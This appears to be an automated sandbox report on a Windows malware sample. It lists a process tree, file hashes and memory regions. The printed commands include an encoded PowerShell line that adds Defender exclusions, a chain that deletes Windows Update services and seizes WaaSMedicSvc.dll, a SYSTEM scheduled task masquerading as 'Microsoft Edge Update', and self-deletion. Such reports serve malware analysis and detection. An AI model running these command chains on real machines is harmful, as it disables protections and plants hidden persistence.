C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcAB3AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHQAbQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAHYAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgBsAHUAIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "Microsoft Edge Update " /tr "\"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "Microsoft Edge Update "3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "Microsoft Edge Update "4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\tmp.exe"3⤵
- Deletes itself
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-16722080571535217169-1709542500797918760-12076781451520547095-1779057725-1623862751"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "73951558960456821916771466051598096447-11099653921517918713434235951165182873"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2009859479288353930655199290-1131329329-1466946350-2058103679-1568932160-964576090"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "3642886732841802791347033148-5762311441526193446-4978928431630435496-1364049561"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exeFilesize
4.9MB
MD5619c8566b61a49d28d25590a16611849
SHA1d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
SHA256aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
SHA512a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
-
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exeFilesize
4.9MB
MD5619c8566b61a49d28d25590a16611849
SHA1d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
SHA256aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
SHA512a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD5de247aaaeae861766c4fe157f263aead
SHA1b224133859b8c57eb3ac439e35242dfba6af20cd
SHA2567d832279f047a2c8a78d6b43a5c75812bbf5bfe2dd39b6036859bd955cdefdbd
SHA5122d0b484c62495b059bfba45bd00450546fa21e08758c7dd354c0a10b01bf1c046fa5f59f13dcc09ae1545122bc17596737ca02991a772a6f2fd8ebc31a50d301
-
C:\Windows\Tasks\dialersvc64.jobFilesize
1KB
MD5abbd0191a24bc43b59af8f4d68925168
SHA1fc003822bb3d537bc54b4c64d01131c8a9180bfd
SHA256225c5b1e38324bbd6e73c5828b04a5746f4c5b94ecccf9c8e9c1ab3eb8edc248
SHA51277d6e7d4c131958f1b6e6a9382a497a3e49e7f262a345511a8c5b62f0c3baef374c7e8f5a3ebbda57b3b7996b0d87f323442117b09d21600f394bfda399e5067
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exeFilesize
4.9MB
MD5619c8566b61a49d28d25590a16611849
SHA1d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
SHA256aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
SHA512a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
-
memory/108-421-0x0000000000000000-mapping.dmp
-
memory/112-117-0x0000000000000000-mapping.dmp
-
memory/272-246-0x0000000001160000-0x000000000118A000-memory.dmpFilesize
168KB
-
memory/316-371-0x0000000000000000-mapping.dmp
-
memory/316-467-0x0000000000000000-mapping.dmp
-
memory/336-92-0x0000000000000000-mapping.dmp
-
memory/416-156-0x0000000000860000-0x000000000088A000-memory.dmpFilesize
168KB
-
memory/416-149-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/416-145-0x0000000000720000-0x0000000000743000-memory.dmpFilesize
140KB
-
memory/416-148-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/416-303-0x0000000000860000-0x000000000088A000-memory.dmpFilesize
168KB
-
memory/416-153-0x0000000000720000-0x0000000000743000-memory.dmpFilesize
140KB
-
memory/460-163-0x0000000000210000-0x000000000023A000-memory.dmpFilesize
168KB
-
memory/460-155-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/460-152-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/476-304-0x0000000000170000-0x000000000019A000-memory.dmpFilesize
168KB
-
memory/476-158-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/476-160-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/476-165-0x0000000000170000-0x000000000019A000-memory.dmpFilesize
168KB
-
memory/484-166-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/484-168-0x00000000003B0000-0x00000000003DA000-memory.dmpFilesize
168KB
-
memory/484-171-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/544-346-0x0000000000000000-mapping.dmp
-
memory/572-101-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-110-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-114-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-107-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-108-0x0000000140001844-mapping.dmp
-
memory/572-106-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-104-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-103-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-102-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-96-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-97-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/572-99-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/580-514-0x0000000000000000-mapping.dmp
-
memory/588-172-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/588-174-0x0000000000490000-0x00000000004BA000-memory.dmpFilesize
168KB
-
memory/588-173-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/604-255-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/604-254-0x0000000001DA0000-0x0000000001DCA000-memory.dmpFilesize
168KB
-
memory/624-75-0x0000000000000000-mapping.dmp
-
memory/664-244-0x0000000000490000-0x00000000004BA000-memory.dmpFilesize
168KB
-
memory/736-413-0x0000000000000000-mapping.dmp
-
memory/744-397-0x0000000000000000-mapping.dmp
-
memory/748-181-0x000007FEBDC30000-0x000007FEBDC40000-memory.dmpFilesize
64KB
-
memory/748-183-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/748-245-0x0000000000BB0000-0x0000000000BDA000-memory.dmpFilesize
168KB
-
memory/796-247-0x00000000008F0000-0x000000000091A000-memory.dmpFilesize
168KB
-
memory/796-248-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/808-414-0x0000000000000000-mapping.dmp
-
memory/812-118-0x0000000000000000-mapping.dmp
-
memory/832-70-0x0000000000000000-mapping.dmp
-
memory/836-249-0x00000000009C0000-0x00000000009EA000-memory.dmpFilesize
168KB
-
memory/836-250-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/852-277-0x0000000000180000-0x00000000001A1000-memory.dmpFilesize
132KB
-
memory/852-112-0x0000000000000000-mapping.dmp
-
memory/852-278-0x00000000779F0000-0x0000000077B70000-memory.dmpFilesize
1.5MB
-
memory/852-73-0x0000000000000000-mapping.dmp
-
memory/852-276-0x00000000000E0000-0x00000000000FB000-memory.dmpFilesize
108KB
-
memory/856-68-0x0000000000000000-mapping.dmp
-
memory/868-252-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/868-251-0x0000000000910000-0x000000000093A000-memory.dmpFilesize
168KB
-
memory/900-431-0x0000000000000000-mapping.dmp
-
memory/920-69-0x0000000000000000-mapping.dmp
-
memory/944-368-0x0000000000000000-mapping.dmp
-
memory/944-91-0x0000000000000000-mapping.dmp
-
memory/956-483-0x0000000000000000-mapping.dmp
-
memory/1008-82-0x0000000000000000-mapping.dmp
-
memory/1020-67-0x0000000000000000-mapping.dmp
-
memory/1060-253-0x00000000007B0000-0x00000000007DA000-memory.dmpFilesize
168KB
-
memory/1076-135-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1076-159-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1076-305-0x0000000077810000-0x00000000779B9000-memory.dmpFilesize
1.7MB
-
memory/1076-141-0x00000000776F0000-0x000000007780F000-memory.dmpFilesize
1.1MB
-
memory/1076-161-0x0000000077810000-0x00000000779B9000-memory.dmpFilesize
1.7MB
-
memory/1076-269-0x0000000000ED0000-0x0000000000EFA000-memory.dmpFilesize
168KB
-
memory/1076-139-0x0000000077810000-0x00000000779B9000-memory.dmpFilesize
1.7MB
-
memory/1076-136-0x00000001400033F4-mapping.dmp
-
memory/1076-138-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/1080-120-0x0000000000000000-mapping.dmp
-
memory/1080-365-0x0000000000000000-mapping.dmp
-
memory/1088-261-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/1088-260-0x0000000000850000-0x000000000087A000-memory.dmpFilesize
168KB
-
memory/1120-256-0x0000000001F50000-0x0000000001F7A000-memory.dmpFilesize
168KB
-
memory/1176-129-0x0000000000340000-0x0000000000CC4000-memory.dmpFilesize
9.5MB
-
memory/1176-124-0x0000000000000000-mapping.dmp
-
memory/1176-268-0x0000000001150000-0x000000000117A000-memory.dmpFilesize
168KB
-
memory/1184-76-0x0000000000000000-mapping.dmp
-
memory/1192-257-0x0000000001E10000-0x0000000001E3A000-memory.dmpFilesize
168KB
-
memory/1208-332-0x0000000000000000-mapping.dmp
-
memory/1224-301-0x0000000000A70000-0x0000000000A9A000-memory.dmpFilesize
168KB
-
memory/1224-302-0x00000000012EB000-0x000000000130A000-memory.dmpFilesize
124KB
-
memory/1224-298-0x0000000000A70000-0x0000000000A9A000-memory.dmpFilesize
168KB
-
memory/1224-299-0x00000000012EB000-0x000000000130A000-memory.dmpFilesize
124KB
-
memory/1224-300-0x00000000012E4000-0x00000000012E7000-memory.dmpFilesize
12KB
-
memory/1224-294-0x0000000000130000-0x000000000015A000-memory.dmpFilesize
168KB
-
memory/1224-284-0x0000000000000000-mapping.dmp
-
memory/1224-295-0x00000000012E4000-0x00000000012E7000-memory.dmpFilesize
12KB
-
memory/1244-61-0x000007FEEDDE0000-0x000007FEEE803000-memory.dmpFilesize
10.1MB
-
memory/1244-62-0x000007FEED280000-0x000007FEEDDDD000-memory.dmpFilesize
11.4MB
-
memory/1244-59-0x0000000000000000-mapping.dmp
-
memory/1244-63-0x00000000026A4000-0x00000000026A7000-memory.dmpFilesize
12KB
-
memory/1244-64-0x00000000026A4000-0x00000000026A7000-memory.dmpFilesize
12KB
-
memory/1244-65-0x00000000026AB000-0x00000000026CA000-memory.dmpFilesize
124KB
-
memory/1284-259-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/1284-258-0x0000000002A70000-0x0000000002A9A000-memory.dmpFilesize
168KB
-
memory/1292-88-0x0000000000000000-mapping.dmp
-
memory/1344-113-0x0000000000000000-mapping.dmp
-
memory/1352-54-0x0000000001030000-0x00000000019B4000-memory.dmpFilesize
9.5MB
-
memory/1352-95-0x00000000005F0000-0x00000000005F6000-memory.dmpFilesize
24KB
-
memory/1352-57-0x000000001C200000-0x000000001C660000-memory.dmpFilesize
4.4MB
-
memory/1352-58-0x000007FEFC091000-0x000007FEFC093000-memory.dmpFilesize
8KB
-
memory/1360-443-0x0000000000000000-mapping.dmp
-
memory/1412-80-0x0000000000000000-mapping.dmp
-
memory/1444-72-0x0000000000000000-mapping.dmp
-
memory/1492-66-0x0000000000000000-mapping.dmp
-
memory/1496-452-0x0000000000000000-mapping.dmp
-
memory/1508-93-0x0000000000000000-mapping.dmp
-
memory/1516-85-0x0000000000000000-mapping.dmp
-
memory/1532-270-0x0000000000370000-0x000000000039A000-memory.dmpFilesize
168KB
-
memory/1544-86-0x0000000000000000-mapping.dmp
-
memory/1576-339-0x0000000000000000-mapping.dmp
-
memory/1608-84-0x0000000000000000-mapping.dmp
-
memory/1616-267-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/1616-266-0x0000000000760000-0x000000000078A000-memory.dmpFilesize
168KB
-
memory/1628-89-0x0000000000000000-mapping.dmp
-
memory/1632-263-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/1632-262-0x0000000000920000-0x000000000094A000-memory.dmpFilesize
168KB
-
memory/1640-74-0x0000000000000000-mapping.dmp
-
memory/1644-71-0x0000000000000000-mapping.dmp
-
memory/1676-507-0x0000000000000000-mapping.dmp
-
memory/1680-116-0x0000000000000000-mapping.dmp
-
memory/1680-78-0x0000000000000000-mapping.dmp
-
memory/1712-79-0x0000000000000000-mapping.dmp
-
memory/1748-83-0x0000000000000000-mapping.dmp
-
memory/1776-473-0x0000000000000000-mapping.dmp
-
memory/1788-399-0x0000000000000000-mapping.dmp
-
memory/1816-90-0x0000000000000000-mapping.dmp
-
memory/1820-94-0x0000000000000000-mapping.dmp
-
memory/1976-297-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/1976-296-0x0000000000140000-0x000000000016A000-memory.dmpFilesize
168KB
-
memory/1984-81-0x0000000000000000-mapping.dmp
-
memory/2000-142-0x0000000000EBB000-0x0000000000EDA000-memory.dmpFilesize
124KB
-
memory/2000-143-0x0000000077810000-0x00000000779B9000-memory.dmpFilesize
1.7MB
-
memory/2000-140-0x0000000000EB4000-0x0000000000EB7000-memory.dmpFilesize
12KB
-
memory/2000-144-0x00000000776F0000-0x000000007780F000-memory.dmpFilesize
1.1MB
-
memory/2000-134-0x00000000776F0000-0x000000007780F000-memory.dmpFilesize
1.1MB
-
memory/2000-495-0x0000000000000000-mapping.dmp
-
memory/2000-133-0x0000000077810000-0x00000000779B9000-memory.dmpFilesize
1.7MB
-
memory/2000-119-0x0000000000000000-mapping.dmp
-
memory/2000-127-0x000007FEF3B50000-0x000007FEF46AD000-memory.dmpFilesize
11.4MB
-
memory/2000-130-0x0000000000EB4000-0x0000000000EB7000-memory.dmpFilesize
12KB
-
memory/2000-126-0x000007FEF46B0000-0x000007FEF50D3000-memory.dmpFilesize
10.1MB
-
memory/2000-458-0x0000000000000000-mapping.dmp
-
memory/2004-77-0x0000000000000000-mapping.dmp
-
memory/2004-115-0x0000000000000000-mapping.dmp
-
memory/2012-264-0x00000000007B0000-0x00000000007DA000-memory.dmpFilesize
168KB
-
memory/2012-265-0x0000000037850000-0x0000000037860000-memory.dmpFilesize
64KB
-
memory/2016-87-0x0000000000000000-mapping.dmp
-
memory/2016-347-0x0000000000000000-mapping.dmp